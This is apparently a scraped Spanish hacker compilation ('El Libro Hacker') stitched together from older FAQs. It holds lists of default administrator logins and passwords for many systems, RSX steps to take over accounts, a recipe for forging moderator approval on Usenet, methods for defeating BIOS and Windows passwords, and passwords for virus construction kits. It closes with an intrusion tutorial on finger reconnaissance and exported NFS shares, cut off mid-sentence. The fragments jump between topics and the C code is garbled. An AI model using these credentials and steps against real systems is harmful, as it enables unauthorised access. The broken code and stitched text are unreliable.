Vdocuments - MX - Anonimo El Libro Hacker 55993a3834ba2
Vdocuments - MX - Anonimo El Libro Hacker 55993a3834ba2
System75
~~~~~~~~
Login: root
INCORRECT LOGIN
Login: browse
Password:
Tops-10
~~~~~~~
NIH Timesharing
VM/370
~~~~~~
VM/370
!
VM/ESA
~~~~~~
VM/ESA ONLINE
COMMAND ===>
Permission granted
annex:
AIX
~~~
guest guest
AS/400
~~~~~~
qsecofr qsecofr /* master security officer */
qsysopr qsysopr /* system operator */
qpgmr qpgmr /* default programmer */
also
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qserv qserv
qsvr qsvr
secofr secofr
qsrv ibmce1
DECserver
~~~~~~~~~
ACCESS
SYSTEM
Major BBS
~~~~~~~~~
Sysop Sysop
Mitel PBX
~~~~~~~~~
SYSTEM
NeXTSTEP
~~~~~~~~
root NeXT
signa signa
me (Rumored to be correct, not checked)
PICK O/S
~~~~~~~~
DSA # Desquetop System Administrator
DS
DESQUETOP
PHANTOM
Prolog
~~~~~~
PBX PBX
NETWORK NETWORK
NETOP
Rolm
~~~~
CBX Defaults
op op
op operator
su super
admin pwp
eng engineer
PhoneMail Defaults
sysadmin sysadmin
tech tech
poll tech
RSX
~~~
SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)
1,1/system (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER
MICRO/RSX
RUN ACNT
o RUN $ACNT
If this works, type "acs lb0:/blks=1000" to get some swap space so the
new step won't wedge.
Escribe " run $acnt" y cambia la contraseña de cualquier cuenta con un grupo
número de 7 o menos.
Puede ser que el ^C no funcione. Prueba^ Z y ESC .
También prueba todas las 3 como terminaciones para horas válidas e invalidas.
SGI Irix
~~~~~~~~
4DGifts
guest
demos
lp
nuucp
tour
tutor
System 75
~~~~~~~~~
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field
Taco Bell
~~~~~~~~~
rgm rollout
tacobell
Verifone Junior 2.05
~~~~~~~~~~~~~~~~~~~~
Default password: 166816
VMS
~~~
field service
systest utep
Troyano:(Caballo de troya)
Virus:
Gusano:
Hecho por el famoso Robert Morris, Jr .,los gusanos son programas que se reproducen
por copiarse asi mismos una y otra vez, sistema a sistema, usando recursos y a veces
aminorando la velocidad de los sistemas.
Usan las redes para extenderse , en muchos casos como los virus usan los archivos
para extenderse. Algunas personas dicen que
la solución a virus ygusanos es no tener ningun archivo o redes. Están probablemente
en lo cierto.
Bombas Lógicas:
Codigo que activará una forma particular de 'attack' (ataque) cuando una condicion
designada se da.
Por ejemplo una bomba lógica podría anulartodos los archivos del 5 de diciembre.
Diferente de un virus, una bomba lógica no hace
copias de si misma.
Los virus más comúnes son los que infectan el sector del boot. Puede ayudar a
protegerte contra esos protegiendo
contra la escritura lo que no necesite escribirse. Definitivamente guarde un juego de
floppys protegidos contra escritura
con los discos del sistema. Si tienes un virus, haz unas cuantas cosas muy simples.
Examine todos los archivos entrantes con una copia reciente de un explorador del virus
bueno.
Entre el mejor está F-Prot, Dr. Solomon Anti-virus Toolkit, y
Thunderbyte Anti-Virus. AVP es también un programa bueno. Usar más de
un explorador podría ser útil.
Nuevos virus salen a razón de aproximadamente 8 por día en estos momentos. Ningún
explorador puede con todos ellos ,
pero los cuatro mencionados aquí hacen el mejor trabajo en este momento. Cualquier
_buen_ explorador descubrirá la mayoría
de los virus comunes. Ningún explorador de virus descubrirá todos los virus.
Ahora mismo hay aproximadamente 5600 virus conocidos. Se escriben nuevos todo
el tiempo. Si usa un explorador para descubrir virus, necesita estar
seguro de que se pone frecuentemente al día. Si cuenta con blockers de la conducta,
usted
deba saber que se pueden desviar fácilmente tales programas por una técnica
conocida como tunnelling.
Hay muchos expertos de virus. Para llegar a ser uno, sólo te lo tienes que llamar.Es
sólo una broma. La comprension de un Virus
conlleva el entender de programación, sistemas operativos, y su interacción. Entender
todo el negocio del 'Culto a los Virus'
requiere mucha discusion. Hay varios articulos buenos disponibles sobre virus, y el
Culto al Virus;
puede encontrar información en ellos casi en cualquier lista en el
virus-l FAQ. El sitio de FTP ftp.informatik.unihamburg.de es un bonito
sitio , fiable, para programas y texto.
2. Estos pasos son llevados a cabo por el funcionamiento del software en anon.penet.fi.
Penet primero busca la direccion e-mail del remitente en su
banco de datos, entonces lo reemplaza con la codificación numérica. Toda otra
información acerca del remitente se quita .
Hay variaciones en este esquema, tal como publicar en Usenet (en que
el paso 3 se elimina ), pero ésa es la idea básica.
Donde anon.penet.fi usa un banco de datos confidencial para asignar los anonimos id's
a la direccion real de e-mail ,
los remailers de cypherpunks usan la criptografía para esconder lasidentidades reales.
Digamos que quiero enviarle un e-mail a una direccion e-mail real, o publicar en
Usenet, pero guardando mi identidad
completamente oculta.
Enviaria un remailer , y ésto es lo qué pasaria.
Si uno confia en el operador del remailer, éste metodo es bastante bueno. Sin
embargo el
punto fuerte del remailers de cypherpunks es que no_tienes_confianza en ningun
sistema ni individuo.
Así,las personas que quieren una garantía realusan una cadena de remailers. Si
cualquier remailer en el
"cadena" es honrado,con uno solo,entonces se asegura la privacidad del mensaje.
Para usar una cadena de remailers, yo primero tengo que preparar el mensaje, que
se anida dentro de capas múltiples de encriptacion, como una muñeca rusa matryosh-
ka.
Preparar tal mensaje es tedioso y es facil equivocarse,así muchas personas usan una
herramienta automatizada
como mi paquete de premail.
Asi , después de preparar el mensaje, se le envía al primer remailer en
la cadena, que corresponde a la capa externa de la encriptacion. Cada
paso por un remailer quita una capa de encriptacion y le envía el mensaje al
próximo, hasta que llega al remailer ultimo. A estas alturas, sólo queda la
capa más profunda de encriptacion. Se despoja esta capa ,
y revela el mensaje del plaintext y el destinatario por primera vez. En
este punto, se le envía al destinatario real su mensaje.
Para hacer esto, uno primero encripta una vez su direccion de e-mail con múltiples
capas de Encriptacion. Entonces, usando un canal encriptado, uno envía la
dirección encriptada al alias servidor, con el apodo que le
guste. El alias servidor registra la dirección encriptada en el
banco de datos. El alias servidor entonces contesta al correo de la misma manera
como anon.penet.fi, sólo que el correo se le reenvía a la cadena de
remailers anónimos.
Para una garantía máxima , el usuario debe acordarse que para cada eslabón en
la cadena, el remailer agrega otra capa de encriptacion al mensaje
mientras quita una capa de la direccion de e-mail . Cuando el usuario finalmente
tiene el e-mail, este esta encriptado en capas múltiples. El matryoshka debe abrir una
muñeca cada vez hasta que el mensaje
del plaintext escondido dentro se revela .
Uno otro punto es que el remailers debe ser fiable para que todo
esto funcione. Ésto es mas verdad cuando se usa una cadena de remailers
--si cualquier uno de los remailers no trabaja, entonces el mensaje será
perdido. Es por esto por lo qué mantengo una lista de remailers fiable. Por
escoger un remailers fiable con que comenzar , hay una oportunidad buena para que el
mensaje llege finalmente.
[email protected]
[email protected]
To: [email protected]
Subject:
TN0_rUlEz
Un articulo anonimo en Usenet es mal visto por otros usuarios de grupos Usenet
expresando que sus opiniones no tienen sin valor. Ésto es porque creen
se usa el anonimato para escudarse de ataques de personas que piensen lo contrario ,
en cambio esto se puede usar para protegerse de prejuicios sociales (o personas que
informan de sus opiniones a sus superiores ).
También si piensa que ésta es una herramienta útil para esconderse contra las
autoridades entonces pienselo de nuevo,
como un caso famoso donde un juez mandó al administrador del servidor revelar la
identidad de unarticulo.
127.0.0.1 es una conexión de la red de loopback. Si usted hace telnet, ftp, etc.
a él se conecta a su propia máquina .
Los mensajes en Usenet constan de títulos (o cabeceras) del mensaje y cuerpos del
mensaje. El
título del mensaje le dice al software de noticias cómo procesar el mensaje.
Se pueden dividir los títulos en dos tipos, requiridos y opcionales.Titulos requiridos son
"From" y "Newsgroups."
Sin los titulos requeridos u obligatorios, no se anunciará su mensaje.
Uno de los títulos optativos son los titulos "Approved" .Para anunciar en un
newsgroup moderado, simplemente agrega una linea de título Approved a su
cabecera del mensaje.La linea de título debe contener el e-mail de los moderadores del
newsgroup a que se dirige.
para ver el formato de esta linea en su newsgroup objetivo , guarde un mensaje del
newsgroup y entonces mirelo usando
cualquier editor del texto.
Approved: [email protected]
No puede haber una línea de espacios en blanco en el título del mensaje. Una línea
del espacios en blanco causa que
cualquier porción del título después de la línea en blanco esinterpretada como parte del
cuerpo del mensaje.
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Ésto depende de qué BIOS tenga la máquina .Las BIOS mas comunes inclullen AMI,
Award, IBM and Phoenix. Existen numerosas otras BIOS , pero éstas son
las más comunes.
Cada BIOS debe guardar esta información de la contraseña en alguna parte. Si puede
acceder a la máquina después de que se
halla inicializado con éxito ( si algun otro a arrancado la maquina con una contraseña
valida por ejemplo ), usted
podria ver la contraseña. Debe saber cual es la direccion de memoria
donde se guarda la contraseña, y el formato en que la contraseña es
guardada . O, debe tener un programa que sabe estas cosas.
El programa mas comun para atacar contraseñas BIOS es por Ami BIOS. Algunos
programas de ataque a las contraseñas le devolveran la contraseña AMI BIOS en texto
sin codificar , otros se
la devolverán en codificaciones ASCII , otros en scan codes. Ésto es dependiente no
sólo del progama de
ataque a la contraseña,sino también de la versión de Ami BIOS.
En algunas placas madre se suelda la batería lo que dificulta quitar la bateria.Si éste es
el caso, tiene otra alternativa.
En alguna parte en la placa madre debe hallar un jumper quelimpie la contraseña
BIOS. Si tiene la documentacion de
su motherboard , sabrá donde esta ese jumper . Si no, el jumper puede estar
etiquetado en la placa madre.
Si no es ninguno de éstos casos, podría suponer cual es el jumper correcto. Este
jumper está de pie usualmente,
cerca de la batería.
Magazine Password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~
VLAD Magazine Issue #1 vlad
VLAD Magazine Issue #2 vx
VLAD Magazine Issue #3 virus
NuKE InfoJournal Issue #2 514738
NuKE InfoJournal Issue #3 power
NuKE InfoJournal Issue #4 party
Program
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~
Sphere Hacker 1.40 & 1.41 theozone
Virus Creation 2000 high level
Virus Construction Lab Chiba City
Ejecutor Virus Creator EJECUTOR
Biological Warfare v0.90 lo tek
Biological Warfare v1.00 freak
Don't hold your breath. Think about it... For a decompiler to work
properly, either 1) every compiler would have to generate substantially
identical code, even with full optimization turned on, or 2) it would
have to recognize the individual output of every compiler's code
generator.
If the first case were to be correct, there would be no more need for
compiler benchmarks since every one would work the same. For the second
case to be true would require in immensely complex program that had to
change with every new compiler release.
OK, let's simplify further and specify that you only want to support one
specific compiler and you want to decompile to the most logical source
code without trying to interpret the optimization. What then? A good
optimizer can and will substantially rewrite the internals of your code,
so what you get out of your decompiler will be, not only cryptic, but in
many cases, riddled with goto statements and other no-no's of good
coding practice. At this point, you have decompiled source, but what
good is it?
Asumire que todo el mundo (por lo menos estos interesados) saben como funciona el
operador XOR.
Ahora, el primer carácter de 'plaintext' es xor con 'len' entonces alimentó con el a
'is_ok.' si el carácter no es válido, es reemplazado por el original
carácter de 'plaintext' antes de la siguiente operacion. La proxima operacion es xor con
'pos' (ésto es inútil
para la primera operacion porque 'len' es 0 y cualquier cosa xor con cero es él mismo)
entonces alimentó a 'is_ok'
con esta segunda operacion y reemplazó con el original si no es válido. La operacion
final (por carácter) es hacer
con esto xor con el carácter previo de'plaintext.'
Si no hay ningún carácter previo, el valor fijo, 42,se usa en el primer carácter de
'plaintext.'
Se alimenta con éste entonces a'is_ok' y si todo esta bien (OK), se guarda en la
primera posición de 'hash1'
Éste de proceso se repite hasta que se agotan todos carácteres del plaintext.
El paso del segundo es muy similar, sólo que ahora, el punto de comienzo es el
último carácter en hash1 y se ponen en hash2 los resultados
del fin al principio. También, en lugar de usar el carácter previo en
el ultimo xoring , se usa el carácter siguiente al caracter actual.
Si ya no hay ningún carácter siguiente al último carácter en hash1, el
valor 42 se usa de nuevo como ultimo caracter.
hash2' es el cordón final y éste es el qué guarda windows en el archivo
CONTROL.INI.
Ahora, lo que todos estabais esperando. Aquí algunos codigos de C que harán
el trabajo sucio por usted:
#include
#include
#include
x=i^j;
return (x>126||x-1;l--)
s1[l]=xor1(xor1(xor1(s[l],l==i?42:s[l+1]),l==i?0:l),i+1);
for(l=0;l BBS (719)578-8288 NUP=NO NUP
N The Edge of Reality (805)496-7460
Static Line (806)747-0802
Area 51 (908)526-4384
N The Drunk Forces +972-3-5733477
Security in Computing
Author: Charles P. Pfleeger
Publisher: Prentice Hall
Copyright Date: 1989
ISBN: 0-13-798943-1.
Network Security
~~~~~~~~~~~~~~~~
Network Security Secrets
Author: David J. Stang and Sylvia Moon
Publisher: IDG Books
Copyright Date: 1993
ISBN: 1-56884-021-7
Network Security
Author: Steven Shaffer and Alan Simon
Publisher: AP Professional
Copyright Date: 1994
ISBN: 0-12-638010-4
N Network Security
Author: Steven L. Shaffer and Alan R. Simon
Publisher: Academic Press
Copyright Date: 1994
ISBN: 0-12-638010-4
Cryptology
~~~~~~~~~~~~
Applied Cryptography: Protocols, Algorithms, and Source Code in C
Author: Bruce Schneier
Publisher: John Wiley & Sons
Copyright Date: 1994
ISBN: 0-471-59756-2
Codebreakers
Author: Kahn
Publisher: Simon and Schuster
Copyright Date:
ISBN:0-02-560460-0
Programmed Threats
~~~~~~~~~~~~~~~~~~
The Little Black Book of Computer Viruses
Author: Mark Ludwig
Publisher: American Eagle Publications
Copyright Date: 1990
ISBN: 0-929408-02-0
ISBN:
Cyberpunk
Author: Katie Hafner and John Markoff
Publisher: Simon and Schuster
Copyright Date: 1991
ISBN: 0-671-77879-X
Unclassified
~~~~~~~~~~~~
The Hacker's Handbook
Author: Hugo Cornwall
Publisher: E. Arthur Brown Company
Copyright Date:
ISBN: 0-912579-06-4
Guerra de la información
Autor: Winn Swartau
Publisher: Thunder Mountain Press
Copyright Date: 1994
ISBN: 1-56025-080-1
Academic Firewalls
Registration Address: Send a message to [email protected]
containing the line "subscribe firewalls user@host"
N The Alert
Registration Address: Send a message to [email protected]
containing the line "subscribe alert"
Bugtraq
Reflector Address: [email protected]
Registration Address: [email protected]
Cert Tools
Reflector Address: [email protected]
Registration Address: [email protected]
N Cypherpunks
Registration Address: Send a message to [email protected]
containing the line "subscribe cypherpunks"
Electronic Payment
Registration Address: [email protected]
N Information Warfare
Registration Address: E-mail [email protected] with a request to be added.
N Linux-Alert
Registration Address: [email protected]
N Linux-Security
Registration Address: [email protected]
Macintosh Security
Reflector Address: [email protected]
Registration Address: [email protected]
NeXT Managers
Registration Address: [email protected]
Phiber-Scream
Registration Address: Send a message to [email protected]
containing the line "subscribe phiber-scream user@host"
rfc931-users
Reflector Address: [email protected]
Registration Address: [email protected]
RSA Users
Reflector Address: [email protected]
Registration Address: [email protected]
WWW Security
Registration Address: [email protected]
Privacy Newsletter
~~~~~~~~~~~~~~~~~~
Privacy Newsletter is a monthly newsletter devoted to showing
consumers how to get privacy and keep it.
Wired
~~~~~
Subscription Address: [email protected]
or: Wired
PO Box 191826
San Francisco, CA 94119-9866
Frequency: Bimonthly
Domestic Subscription Rate: $15/year (6 issues)
PrivateLine
~~~~~~~~~~~
5150 Fair Oaks Blvd. #101-348
Carmichael, CA 95608 USA
E-Mail: [email protected]
Text of back issues are at the etext archive at Michigan. Gopher over
or ftp to: etext.archive.umich.edu/pub/Zines/PrivateLine
Memberships are $20.00 per year for students, $40.00 per year for
regular members, and $100.00 per year for organizations.
The word "free" in our name refers to freedom, not price. You may or
may not pay money to get GNU software, but regardless you have two
specific freedoms once you get it: first, the freedom to copy a
program and give it away to your friends and co-workers; and second,
the freedom to change a program as you wish, by having full access to
source code. You can study the source and learn how such programs are
written. You may then be able to port it, improve it, and share your
changes with others. If you redistribute GNU software you may charge
a distribution fee or give it away, so long as you include the source
code and the GPL (GNU General Public License).
Annual dues for individual members are $42 for employed professionals,
$10.50 for students, and $21 for others. We appreciate activists, but
members who cannot contribute their time are also welcome.
To contact the League, phone (617) 243-4091, send Internet mail to the
address [email protected], or write to:
SotMESC
P.O. Box 573
Long Beach, MS 39560
CERT is the Computer Emergency Response Team that was formed by the
Defense Advanced Research Projects Agency (DARPA) in November 1988 in
response to the needs exhibited during the Internet worm incident.
The CERT charter is to work with the Internet community to facilitate
its response to computer security events involving Internet hosts, to
take proactive steps to raise the community's awareness of computer
security issues, and to conduct research targeted at improving the
security of existing systems.
Telephone number
(412)268-7090 (24-hour hotline)
CERT Coordination Center personnel answer
7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
emergencies during other hours.
FAX number
(412)268-6989
Sniffer FAQ
Author: Christopher Klaus of Internet Security Systems, Inc.
ftp: ftp.iss.net /pub/faq/sniff
Cryptography FAQ
Author: The Crypt Cabal
ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/
Firewalls FAQ
Author: Marcus J. Ranum ([email protected])
ftp: rtfm.mit.edu /pub/usenet-by-group/comp.security.misc/
Introduction to Scanning
Author: [email protected] (Bob Parnass, AJ9S)
ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
comp.os.netware.security FAQ
Author: Fauzan Mirza
ftp: rtfm.mit.edu /pub/usenet-by-group/comp.os.netware.security/
rec.pyrotechnics FAQ
Author: [email protected] (Hans Josef Wagemueller)
ftp: rtfm.mit.edu /pub/usenet-by-group/rec.pyrotechnics/
CPU Advance
PO Box 2434
Harwood Station
Littleton, MA 01460
(508)624-4819 (Fax)
Timeline Inc,
23605 Telo Avenue
Torrence, CA 90505
(800)872-8878 (Voice)
(800)223-9977 (Voice)
Alltronics
2300 Zanker Road
San Jose CA 95131
(408) 943-9774 Voice
(408) 943-9776 Fax
(408) 943-0622 BBS
Part Number: 92U067
Atalla Corp
San Jose, CA
(408) 435-8850
Orange Book
DoD 5200.28-STD
Department of Defense Trusted Computer System Evaluation Criteria
Green Book
CSC-STD-002-85
Department of Defense Password Management Guideline
Yellow Book
CSC-STD-003-85
Computer Security Requirements -- Guidance for Applying the Department
of Defense Trusted Computer System Evaluation Criteria in Specific
Environments
Yellow Book
CSC-STD-004-85
Technical Rationale Behind CSC-STD-003-85: Computer Security
Requirements. Guidance for Applying the Department of Defense Trusted
Computer System Evaluation Criteria in Specific Environments.
Tan Book
NCSC-TG-001
A Guide to Understanding Audit in Trusted Systems
Red Book
NCSC-TG-005
Trusted Network Interpretation of the Trusted Computer System
Evaluation Criteria
Orange Book
NCSC-TG-006
A Guide to Understanding Configuration Management in Trusted Systems
Burgundy Book
NCSC-TG-007
A Guide to Understanding Design Documentation in Trusted Systems
Aqua Book
NCSC-TG-010
A Guide to Understanding Security Modeling in Trusted Systems
Pink Book
NCSC-TG-013
Rating Maintenance Phase -- Program Document
Purple Book
NCSC-TG-014
Guidelines for Formal Verification Systems
Brown Book
NCSC-TG-015
A Guide to Understanding Trusted Facility Management
Yellow-Green Book
NCSC-TG-016
Guidelines for Writing Trusted Facility Manuals
Light Blue
NCSC-TG-017
A Guide to Understanding Identification and Authentication in Trusted
Systems
Blue Book
NCSC-TG-019
Trusted Product Evaluation Questionnaire
Gray Book
NCSC-TG-020A
Trusted Unix Working Group (TRUSIX) Rationale for Selecting
Access Control List Features for the Unix System
Lavender Book
NCSC-TG-021
Trusted Data Base Management System Interpretation of the Trusted
Computer System Evaluation Criteria
Yellow Book
NCSC-TG-022
A Guide to Understanding Trusted Recovery in Trusted Systems
Purple Book
NCSC-TG-024 (Volume 1/4)
A Guide to Procurement of Trusted Systems: An Introduction to
Procurement Initiators on Computer Security Requirements
Purple Book
NCSC-TG-024 (Volume 2/4)
A Guide to Procurement of Trusted Systems: Language for RFP
Specifications and Statements of Work - An Aid to Procurement
Initiators
Purple Book
NCSC-TG-024 (Volume 3/4)
A Guide to Procurement of Trusted Systems: Computer Security Contract
Data Requirements List and Data Item Description Tutorial
+Purple Book
+NCSC-TG-024 (Volume 4/4)
+A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
+Proposal Document - An Aid to Procurement Initiators and Contractors
Green Book
NCSC-TG-025
A Guide to Understanding Data Remanence in Automated Information
Systems
Turquiose Book
NCSC-TG-027
A Guide to Understanding Information System Security Officer
Responsibilities for Automated Information Systems
Violet Book
NCSC-TG-028
Assessing Controlled Access Protection
Blue Book
NCSC-TG-029
Introduction to Certification and Accreditation
C1 Technical Report-001
Computer Viruses: Prevention, Detection, and Treatment
NTISSAM COMPUSEC/1-87
Advisory Memorandum on Office Automation Security Guideline
--
You can get your own free copy of any or all of the books by writing
or calling:
Barbara Keller
(410) 766-8729
If you ask to be put on the mailing list, you'll get a copy of each new
book as it comes out (typically a couple a year).
No.
Sección F: Misceláneo
~~~~~~~~~~~~~~~~~~~~~~~~
Los hackers deben ser juzgados por sus actos a la hora de acceder a los
ordenadores (1) , no por criterios ficticios
como, edad, raza, o posición.
Get it on my BBS:
Hacker's Haven (303)343-4053
EOT
--
\* Will Spencer: El adelantamiento y difusión de conocimiento*\
\* Unix geek: es el unico guardián de libertad verdadera. *\
\* PC gurú: --James Madison*\
\* Revolutionary : 4th U.S. President *\
Agujeros de Seguridad.
Este texto es un poco mas tecnico pero da una idea general sobre los fallos de
seguridad que puede tener un
determinado sistema.
Traducido por Tosh & ReK2WiLdS
BBK ôBig Bro Killerzö
http://www.geocities.com/SiliconValley/Pines/7347
[email protected]
From: Manifestation
Tema: Agujeros de seguridad se manifiestan (en general) en cuatro modos...
Date: 11.10.93
- Cuando el problema esta causado por una mala escritura de partes "privilegiadas"
de software (daemons, cronjobs) que pueden estar comprometidos a realizar tareas
que no deberian.
El ejemplo mas famoso de esto es el bug del sendmail (ver bibliografia) que podia
permitir a un cracker el pillar una shell root. Esto podria ser usado para borrar
archivos, crear nuevas cuentas, copiar el fichero de passwords, cualquier cosa.
(Contrariamente a lo que la gente piensa, los ataques via sendmail no estaban
solo restringidos al infame "Gusano de Internet" (Internet Worm) - cualquier
cracker podia hacer esto Telneteando al puerto 25 de la victima. La historia
detras de un agujero similar (esta vez en el software "move-mail" de EMACS) se
describe en [Stoll].)
Nuevos agujeros como este aparecen todo el tiempo, y tus mejores esperanzas son:
b. suscribirse a una lista de mail para poder tener lo antes posible informacion
con detalles acerca de problemas y/o parches, y actuar en cuanto la tengas.
>From: Wes Morgan
>
> c: Cuando instales/actualices un sistema dado, trata de instalar/habilitar solo
>aquellos paquetes de software por los que tengas una necesidad inmediata o
>previsible. Muchos paquetes incluyen daemons o utilidades que pueden revelar
>informacion a extra±os. Por ejemplo, el paquete de contabilidad del Unix System
>V de AT&T incluye >acctcom(1), que podria permitir (por omision) a cualquier ususario
>el revisar los datos de las cuentas diarias de cualquier otro usuario.
>>Muchos paquetes TCP/IP instalan/cargan automaticamente programas tales como
rwhod,
>fingerd, y (ocasionalmente) tftpd, pudiendo todos presentar problemas de seguridad.
>
>Una administracion del sistema cuidadosa es la solucion. Muchos de estos programas
>son inicializados/iniciados en el arranque; desearas cambiar tus scripts de arranque
>(normalmente en los directorios /etc, /etc/rc, /etc/rcX.d) para prevenir su ejecucion.
>Desearas eliminar algunas utilidades completamente. Para algunas utilidades, un
>simple chmod(1) puede prevenir el acceso de usuarios no autorizados
>
>Resumiendo, NO CONFIES EN LOS SCRIPTS/PROGRAMAS DE INSTALACION!
Tales facilidades
>tienden a instalar/cargar todo lo que hay en el paquete sin preguntartelo. Muchos
>manuales de instalacion incluyen listas de "los programas incluidos en este paquete";
>asegurate de revisarlo.
---
From: Hacking
Tema: Ideas de hacking
Date: 11/10/93
[Muchas de las ideas tomadas de: HaxNet - APG V1.3 : Guia para encontrar nuevos
agujeros]
Un buen comienzo seria el listar todos los binarios suid de las diferentes versiones
de los sistemas operativos. Despues intentar averiguar por que cada programa es suid
ej: rcp es suid root ya que debe usar un puerto privilegiado para autentificar nombres
de usuario.
A menudo, codigo que nunca fue dise±ado para ser suid, se hace suid, para resolver
problemas de acceso a ficheros.
Necesitamos crear una base de datos que sea capaz de "mirar" a pares y trios de
datos,
especificamente:nombre del programa, suid, sgid, objeto accedido (por que es
suid/sgid),
version del sistema operativo.
Alguna sugerencia de como implementar dicha base de datos?
Caja de herramientas
=====================
AGREP: Recomiendo a todo el mundo pillar e instalar agrep de:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep soporta "windowing" por lo que puede busacr rutinas, y subrutinas. Tambien
soporta operadores logicos y es de esta forma ideal para automatizar la busqueda de
muchos de estos defectos. Ej:
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c
TCOV:
TEXTOS: Hay varios textos que tratan metodos sobre como encontrar defectos, y
presentan series de tests
1) Un estudio empirico de la seguridad de las utilidades UNIX, por Barton P. Miller,
Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,Diciembre 90. Describe
una serie de tests para testear cadenas aleatorias de entradas.
Los resultados indicaban que un 25% de los programas se colgaban, se venian abajo,
o
no actuaban como debian. En un caso el sistema operativo se vino abajo.
El entendimiento de la composicion del buffer y el registro en el ambiente en
cuestion, y la entrada esperada se entiende que dara los resultados esperados.
2) El conjunto de herramientas Mothra, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.Spafford,
Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years ago.
(Anyone have a citation?).
4) Las rutinas SUID/SGID que usan las llamadas system(),popen(), execlp(), o execvp()
para ejecutar otra cosa.
5) Cualquier programa que use nombres relativos de ruta (path) dentro del programa
7) Rutinas que no chequean codigos de error devueltos por llamadas del sistema
(Ej: fork(2), suid(2),setuid(), como en el famoso bug rcp)
10) Buscar en los textos man, y guias de usuario las advertencias en contra de las
X, y tratar variaciones de X. Hacer lo mismo con la seccion de bugs.
11) Buscar comandos o funciones raramente usados o inusuales. En particular seria util
buscar argumentos indocumentados. Buscar flags de distribuciones anteriores, o en
versiones de otros sistemas operativos. Chequear las opciones que otros programas
podrian usar. Por ejemplo, Telnet usa la opcion -h para conectarse...
13) Fallos del software para verificar que realmente esta comunicandose con el
software
o modulo de hardware al que quiere acceder.
15) Implementacion pobre que da como resultado, por ejemplo, codigos de condicion
testeados inapropiadamente
16) Confianza inplicita: La rutina B asume que los parametros de la rutina A son
correctos por que la rutina A es un proceso de sistema
23) Buscar niveles del sistema donde los modulos alli involucrados fueron escritos
por programadores diferentes, o grupo de programadores - se suelen encontrar
agujeros.
26) Archivos temporales, buffers leibles por grupos o por todo el mundo
31) Codigo que usa fopen(3) sin poner la umask. (ej: at(1), etc.). En general, codigo
que no resetea el UID real y efectivo antes de bifurcarse
32) Tracear es muy util para ayudarte a descubrir que llamadas de sistema usa un
programa
33) Escanea los sistemas de archivos /usr/local de cerca. Muchos administradores
instalaran software de la red. A menudo encontraras tcpdump, top, nfswatch,... suid
root por su facilidad de uso.
34) Comprobar que los programas suid fueron los que originalmente se pusieron en el
sistema. Algunas veces los administradores reemplazaran el password por uno menos
seguro que el de las distribuciones.
35) Buscar programas que se usaran para instalar software o modulos de kernel
38) Ver si es posible que un programa de canales I/O pueda automodificarse, hacer un
loop, y asi ejecutar el nuevo codigo modificado.
39) Si los canales I/O actuan como procesadores independientes tendran acceso
ilimitado
a la memoria, y asi el codigo de sistema podria ser modificado en memoria previamene
a su ejecucion.
40) Buscar bugs que requieran errores en multiples partes del software,ej: di por
ejemplo que el programa "a" puede usarse para cambiar el fichero de configuracion
/etc/a ,
ahora el programa "b" asume que la informacion de a es correcta y esto lleva a
resultados
inesperados (solo mira cuantos programas confian en el fichero /etc/utmp)
Aqui esta un texto eminentemente practico donde se pueden ver algunas de las formas
de
conseguir un archivo passwd.
Esta un poco anticuado pero aun se encuentran maquinas que sucumben ante los
encantos de una de
estas "preciosidades".
[email protected] [email protected]
Introducción
Todos los días, en todo el mundo, las redes de ordenadores y hosts son
violados. El nivel de sofisticación de estos ataques varia ampliamente;
mientras hay una creencia generalizada que la mayoría de estas intrusiones
tienen éxito debido a la debilidad de los passwords, hay todavía un gran
numero de intrusiones que hacen uso de técnicas mas avanzadas para entrar.
Poco es sabido acerca de este ultimo tipo de intrusiones , debido
principalmente a su naturaleza y a su dificultad de ser detectadas.
--------
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. Cualquier sistema en Internet (y muchos que no lo están) son
susceptibles de ser violados fácilmente. Son estos objetivos inusuales? Que
ocurrió?
Fade to......
---------
Overview
En un esfuerzo por verter algo de luz sobre como ocurren estas intrusiones
cada vez mas avanzadas, este texto reseña varios mecanismos usados
actualmente por los crackers para obtener acceso a los sistemas y,
adicionalmente, algunas tecnicas que sospechamos estan usando, o hemos
usado nosotros mismos en tests o ambientes autorizados/amigables.
Ganando Informacion
Ahora intentas mas tacticas. Como todos los devotos del finger sabran,
hacer finger "@", "0", y "", asi como a nombre comunes, como root, bin,
ftp, system, guest, demo, manager, etc..., puede revelar informacion
interesante. Lo que esa informacion sea depende de la version de finger que
tu victima este usando, pero la mas importante son nombres de cuentas,
conjuntamente con sus home directories y el ultimo host desde el que se
conectaron.
Para añadir a esta informacion, puedes tambien usar rusers (en particular
con la extension -l ) para pillar informacion valiosa sobre usuarios
conectados.
Notar que /export/foo esta "exportado al mundo"; tambien fijaros que este
es el home directory del usuario "guest". Es hora de tu primera intrusion!
En este caso, montaras el home directoy del usuario "guest". Como no tienes
la cuenta correspondiente en esa maquina y como root no puede modificar
archivos en un sistema de archivos NFS, creas una cuenta "guest" en tu
